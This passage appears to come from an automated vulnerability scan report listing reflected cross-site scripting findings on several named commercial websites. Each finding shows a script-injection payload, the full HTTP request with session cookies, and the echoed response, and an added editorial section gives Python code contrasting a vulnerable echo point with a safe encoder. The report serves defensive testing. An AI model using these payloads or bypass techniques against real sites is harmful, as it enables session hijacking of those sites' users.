<HTML>
   <HEAD>
       <title>New Features in Maple 15 ... Technical Computing Software for Engineers, Mathematicians, Scientists, Teachers
...[SNIP]...
nel on the next lines. */
s.pageName="Maple:New:Home"
s.server="North America"
s.channel="Maple:New"
s.pageType=""
s.prop3="english"
s.prop13="Non-Member"
/* Conversion Variables */
s.campaign="TC-194592a7b";alert(1)//97e7ce188ef"
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.currencyCode=""
s.eVar13="Non-Member"
s.eVar18="Maple"
s.hier1="Products|Maple 15"
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANY
...[SNIP]...

1.21. http://www.novedge.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.novedge.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86ddf'><script>alert(1)</script>c860ba290c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?86ddf'><script>alert(1)</script>c860ba290c6=1 HTTP/1.1
Host: www.novedge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 20:01:42 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=100" >
<base href='http://www.nove
...[SNIP]...
<a class='MediumLink' style='font:normal 0.9em tahoma;color:#000;' href='/default.asp?86ddf'><script>alert(1)</script>c860ba290c6=1'>
...[SNIP]...

1.22. http://www.novedge.com/products/5082 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.novedge.com
Path:   /products/5082

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bc5b'%20a%3db%20c47aa2464be was submitted in the REST URL parameter 2. This input was echoed as 9bc5b' a=b c47aa2464be in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products/50829bc5b'%20a%3db%20c47aa2464be HTTP/1.1
Host: www.novedge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.novedge.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCDARCDA=AOOIJDPAJNLFLMGJEGBOGCOJ; __utma=104052895.1586457492.1317672101.1317672101.1317672101.1; __utmb=104052895; __utmc=104052895; __utmz=104052895.1317672101.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 20:05:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=100" >
<base href='http://www.nove
...[SNIP]...
<a class='MediumLink' style='font:normal 0.9em tahoma;color:#000;' href='page_bookmark.asp?SKU=50829bc5b' a=b c47aa2464be'>
...[SNIP]...

1.23. http://www.novedge.com/products/5082 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.novedge.com
Path:   /products/5082

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d42d7'><script>alert(1)</script>9eb5bd3fac6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/5082?d42d7'><script>alert(1)</script>9eb5bd3fac6=1 HTTP/1.1
Host: www.novedge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.novedge.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCDARCDA=AOOIJDPAJNLFLMGJEGBOGCOJ; __utma=104052895.1586457492.1317672101.1317672101.1317672101.1; __utmb=104052895; __utmc=104052895; __utmz=104052895.1317672101.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 20:05:46 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=100" >
<base href='http://www.nove
...[SNIP]...
<a class='MediumLink' style='font:normal 0.9em tahoma;color:#000;' href='page_bookmark.asp?d42d7'><script>alert(1)</script>9eb5bd3fac6=1&SKU=5082'>
...[SNIP]...

1.24. http://www.nxrev.com/content-0 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nxrev.com
Path:   /content-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41cf9"><script>alert(1)</script>c6bea8865ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41cf9\"><script>alert(1)</script>c6bea8865ab in the application's response. The backslash the application inserts before the double quote is a JavaScript/SQL-style string escape; an HTML attribute value has no backslash escape, so the browser still ends the href at that quote and parses the following script element as normal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content-0?41cf9"><script>alert(1)</script>c6bea8865ab=1 HTTP/1.1
Host: www.nxrev.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nxrev.com/software/creo-elementspro
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS27194b44324db43e775ea265cf2ee23f=c70b3de1d6c64f34ced9ae5dcc424fd5

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:04:46 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 03 Oct 2011 20:04:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
<a href="http://www.nxrev.com/content-0?q=node/179&41cf9\"><script>alert(1)</script>c6bea8865ab=1&svpage=overview">
...[SNIP]...

1.25. http://www.nxrev.com/content-0 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nxrev.com
Path:   /content-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52341</script><script>alert(1)</script>b8791619bc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
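Worked example, added by the editor and not part of the report or of the maplesoft.com and nxrev.com applications: Python reconstructions of the two script-context echo points in findings 1.20 and 1.25, beside an output encoder that is safe in that context. The payloads are copied from those findings; the function names, the exact template lines and the round-trip oracle are assumptions made for illustration.

```python
import json

# Constructed inputs: the payloads from findings 1.20 and 1.25, as reflected.
CAMPAIGN_PAYLOAD = 'TC-194592a7b";alert(1)//97e7ce188ef'
URL_PAYLOAD = "http://www.nxrev.com/content-0?q=node/179&52341</script><script>alert(1)</script>b8791619bc7=1"


def vulnerable_campaign(campaign: str) -> str:
    """Reconstruction of the 1.20 echo point: value interpolated into a double-quoted JS string."""
    return f's.campaign="{campaign}"'


def vulnerable_url(url: str) -> str:
    """Reconstruction of the 1.25 echo point: value interpolated into a single-quoted JS string."""
    return f"var strSVSyndicationURL = escape('{url}');"


def quote_escaped_url(url: str) -> str:
    """A common but insufficient fix: backslash-escape the quote character only.
    The HTML tokenizer ends the script element at </script> regardless of JS string state."""
    return vulnerable_url(url.replace("'", "\\'"))


def js_string_literal(value: str) -> str:
    """Emit a JS string literal that is safe inside an inline <script> block.

    json.dumps handles quotes, backslashes and control characters, and with the
    default ensure_ascii=True also U+2028/U+2029. '<', '>' and '&' are then written
    as \\uXXXX escapes so the HTML tokenizer never sees '</script>' or a comment opener.
    """
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def hardened_campaign(campaign: str) -> str:
    return f"s.campaign={js_string_literal(campaign)}"


def hardened_url(url: str) -> str:
    return f"var strSVSyndicationURL = escape({js_string_literal(url)});"


def literal_round_trips(literal: str, original: str) -> bool:
    """Oracle: the emitted text is exactly one string literal whose value is the original input.
    JSON string syntax is a subset of JS string syntax, so json.loads is a fair judge here."""
    try:
        return json.loads(literal) == original
    except ValueError:
        return False
```

The round-trip oracle shows why the quote-only escape in quote_escaped_url is not enough: the HTML tokenizer finds </script> before the JavaScript parser ever runs, so the string literal's quoting is irrelevant to that breakout. Encoding <, > and & as \uXXXX escapes keeps the JavaScript value identical while removing every byte sequence the HTML tokenizer could act on.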

Request

GET /content-0?52341</script><script>alert(1)</script>b8791619bc7=1 HTTP/1.1
Host: www.nxrev.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nxrev.com/software/creo-elementspro
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS27194b44324db43e775ea265cf2ee23f=c70b3de1d6c64f34ced9ae5dcc424fd5

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:41 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 03 Oct 2011 20:05:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
ntactID = '';
var strSVPageShortcut = 'overview';
var strSVPageRenderViewID = '454428';
var strSVSyndicationType = 'server';
var strSVSyndicationURL = escape('http://www.nxrev.com/content-0?q=node/179&52341</script><script>alert(1)</script>b8791619bc7=1');
var strSVSessionReferralSource = '';
var strSVSessionReferralKeywords = '';
fncSVPageTrackingInit();
</script>
...[SNIP]...

1.26. http://www.ptc.com/appserver/auth/authenticate.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /appserver/auth/authenticate.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload efdc8--><script>alert(1)</script>b736844fc35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /appserverefdc8--><script>alert(1)</script>b736844fc35/auth/authenticate.jsp?dest=http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://communities.ptc.com/community/search.jspa?peopleEnabled=true&userID=&containerType=&container=&spotlight=true&q=xss+bond+interest+faq
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; JSESSIONID=9F060F64C63990D594F35D4CE781D085.hqjbsprd02-e; country=US; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; tzmsec=-18000000; s_cc=true; s_gpv_page=Search%20-%20PTC.com; s_gpv_searchterm=null%3A%20xss%20txt%20css%20img%20help%20faq; s_eVar8=null%3A%20xss%20txt%20css%20img%20help%20faq; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:06:13 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=2A388610E8DC61DF60BAB9D35586AA44.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 43374
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:41:38 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /appserverefdc8--><script>alert(1)</script>b736844fc35/auth/authenticate.jsp-->
...[SNIP]...

1.27. http://www.ptc.com/appserver/search/results.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /appserver/search/results.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389fc"><script>alert(1)</script>c47fd1f535d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver389fc"><script>alert(1)</script>c47fd1f535d/search/results.jsp?q=xss+txt+css+img+help+faq HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:06:01 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=D4C407ABF1307567097C16F0673490AD.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44115
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:41:26 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<input type="hidden" name="MISSING_DOC" value="/appserver389fc"><script>alert(1)</script>c47fd1f535d/search/results.jsp">
...[SNIP]...

1.28. http://www.ptc.com/appserver/search/results.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /appserver/search/results.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload a3018--><script>alert(1)</script>1d5dd36019e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /appservera3018--><script>alert(1)</script>1d5dd36019e/search/results.jsp?q=xss+txt+css+img+help+faq HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 20:06:05 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=9E5F844BA3ADEA0549C3DCA5EEE7AE2A.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 44117
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:41:30 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<title>Document Not Found - PTC.com</title>
<meta http-equiv="Con
...[SNIP]...
<!-- bad url: /appservera3018--><script>alert(1)</script>1d5dd36019e/search/results.jsp-->
...[SNIP]...

1.29. http://www.ptc.com/appserver/search/results.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /appserver/search/results.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96376"><script>alert(1)</script>a17eafe0063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/search/results.jsp?q=xss+txt+css+img+help+faq&96376"><script>alert(1)</script>a17eafe0063=1 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:06:00 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=0A3C776D9D4EE8186B38C368A400006A.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 31828
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:41:25 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search - PTC.com</
...[SNIP]...
<a href="?&amp;96376"><script>alert(1)</script>a17eafe0063=1">
...[SNIP]...

1.30. http://www.ptc.com/appserver/search/results.jsp [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /appserver/search/results.jsp

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 6c758<script>alert(1)</script>7bfa5113c66 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appserver/search/results.jsp?q=xss+txt+css+img+help+faq6c758<script>alert(1)</script>7bfa5113c66 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:22 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=E1B6FE81D6505535E1D8DEB29FD57C32.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 31901
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:47 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search - PTC.com</
...[SNIP]...
<span>xss txt css img help faq6c758<script>alert(1)</script>7bfa5113c66</span>
...[SNIP]...

1.31. http://www.ptc.com/appserver/search/results.jsp [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /appserver/search/results.jsp

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6727d\'%3balert(1)//f80b1e7de25 was submitted in the q parameter. This input was echoed as 6727d\\';alert(1)//f80b1e7de25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /appserver/search/results.jsp?q=xss+txt+css+img+help+faq6727d\'%3balert(1)//f80b1e7de25 HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ptc.com/solutions/product-lifecycle-management/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=12.11.148.55.1317672118140583; country=US; tzmsec=-18000000; s_cc=true; s_sq=%5B%5BB%5D%5D; NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660; s_gpv_page=Solutions%20%3E%20Product%20Lifecycle%20Management%20%28PLM%29

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:05:19 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=B7F14ABFFC6AD6DF7C796F49E33418E9.hqjbsprd02-e; Domain=ptc.com; Path=/
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 31866
Set-Cookie: NSC_xxx-wjq1=ffffffff0f038a5d45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 20:40:45 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search - PTC.com</
...[SNIP]...
<script type="text/javascript">
   try {
       s.prop6='null: xss txt css img help faq6727d\\';alert(1)//f80b1e7de25';    
   } catch (err) {}

   FastSearch.more = 'more';
   FastSearch.less = 'less';
   PTCAddLoadEvent(FastSearch.dd);    
   PTCAddLoadEvent(FastSearch.trackClickInit);
</script>
...[SNIP]...

1.32. http://www.ptc.com/common/account/index.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ptc.com
Path:   /common/account/index.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3dc21--><script>alert(1)</script>677d085690c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /common3dc21--><script>alert(1)</script>677d085690c/account/index.htm HTTP/1.1
Host: www.ptc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
